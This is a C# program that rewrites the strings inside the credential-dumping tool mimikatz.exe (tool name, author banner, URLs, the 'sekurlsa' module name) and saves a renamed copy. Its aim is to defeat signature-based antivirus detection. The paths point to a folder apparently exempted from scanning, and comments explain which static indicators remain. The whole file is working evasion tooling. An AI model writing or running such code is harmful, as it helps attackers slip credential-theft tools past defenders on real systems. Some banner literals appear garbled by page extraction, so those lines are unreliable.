Program.cs
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace ReplaceString
{
class Program
{
/// <summary>
/// Loads C:\tools\excluded\mimikatz.exe as a hex string, runs a fixed chain of
/// string substitutions over it with ReplaceString, and passes the result to
/// HexToExe, which writes it to C:\tools\excluded\mimihex.exe.
/// </summary>
/// <remarks>
/// Only the literal strings listed below are rewritten, and ReplaceString looks
/// for them in their UTF-16LE form only. The output therefore has a different
/// file hash and lacks those UTF-16LE strings, while every byte sequence this
/// program does not search for (code, imports, single-byte encodings of the
/// same strings) stays available as a static indicator. Run-time behaviour of
/// the binary is not altered here, so behaviour-based detection is unaffected.
/// NOTE(review): both paths sit under a directory named "excluded", presumably
/// one exempted from AV scanning; confirm on the host.
/// NOTE(review): as shown on this page the banner literals have single spaces
/// and "[email protected]" placeholders, which looks like page-extraction
/// damage; confirm the exact literals against the original file.
/// </remarks>
/// <param name="args">Command-line arguments; not read.</param>
static void Main(string[] args)
{
// Whole input file as upper-case hex text, two digits per byte.
var hexrep = ExeToHex(@"C:\tools\excluded\mimikatz.exe");
// Tool name first: later search strings below already contain "mimifish",
// so they can only match after this substitution has run.
string replacedHex = ReplaceString(hexrep, @"mimikatz", "mimifish");
// Start-up banner lines (author, version/build line, URLs).
replacedHex = ReplaceString(replacedHex, @"## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )", @" /*** Benjamin fishY gentilfish ( [email protected] )");
replacedHex = ReplaceString(replacedHex, @".#####. mimifish 2.2.0 (x64) #18362 May 13 2019 01:35:04", @" mimifish 2.2.0 (x64) May 13 2019 ");
replacedHex = ReplaceString(replacedHex, @"'#####' > http://pingcastle.com / http://mysmartlogon.com ***/", @" ");
replacedHex = ReplaceString(replacedHex, @".## ^ ##. ", @" ");
replacedHex = ReplaceString(replacedHex, @"## \ / ## > http://blog.gentilkiwi.com/mimifish", @" ");
replacedHex = ReplaceString(replacedHex, @"'## v ##' Vincent LE TOUX ( [email protected] )", @" ");
// Module name string.
replacedHex = ReplaceString(replacedHex, @"sekurlsa", @"sekufish");
// Decode the hex text back to bytes and write the output file.
HexToExe(replacedHex);
}
/// <summary>
/// Reads a file and returns its contents as upper-case hex text, exactly two
/// digits per byte and no separators.
/// </summary>
/// <param name="filename">Path of the file to read.</param>
/// <returns>The file's bytes as a hex string, in file order.</returns>
public static string ExeToHex(string filename)
{
    byte[] contents = File.ReadAllBytes(filename);
    var hex = new StringBuilder();
    for (int i = 0; i < contents.Length; i++)
    {
        // "X2" always yields two upper-case digits, e.g. 0x0A -> "0A".
        hex.Append(contents[i].ToString("X2"));
    }
    return hex.ToString();
}
/// <summary>
/// Substitutes one string for another inside a hex dump, matching on the
/// UTF-16LE encoding of both strings.
/// </summary>
/// <param name="hexFileInMemory">Upper-case hex text, two digits per byte.</param>
/// <param name="find">String to look for; encoded with Encoding.Unicode before matching.</param>
/// <param name="replace">String to put in its place; encoded only if a match exists.</param>
/// <returns>
/// The hex text with every occurrence of the encoded <paramref name="find"/>
/// replaced, or the input unchanged when there is no occurrence.
/// </returns>
public static string ReplaceString(string hexFileInMemory, string find, string replace)
{
    // Hex form of the search string as it would appear in the dump.
    string needle = string.Concat(Encoding.Unicode.GetBytes(find).Select(b => b.ToString("X2")));
    if (!hexFileInMemory.Contains(needle))
    {
        return hexFileInMemory;
    }

    string substitute = string.Concat(Encoding.Unicode.GetBytes(replace).Select(b => b.ToString("X2")));
    return hexFileInMemory.Replace(needle, substitute);
}
/// <summary>
/// Decodes hex text (two digits per byte) to bytes and writes them to the
/// fixed path C:\tools\excluded\mimihex.exe.
/// </summary>
/// <param name="hex">Hex text to decode; consumed two characters at a time.</param>
public static void HexToExe(string hex)
{
    var decoded = new List<byte>();
    int offset = 0;
    while (offset < hex.Length)
    {
        // Each pair of hex digits becomes one byte.
        decoded.Add(Convert.ToByte(hex.Substring(offset, 2), 16));
        offset += 2;
    }

    using (var output = new BinaryWriter(File.OpenWrite(@"C:\tools\excluded\mimihex.exe")))
    {
        output.Write(decoded.ToArray());
        output.Flush();
    }
}
}
}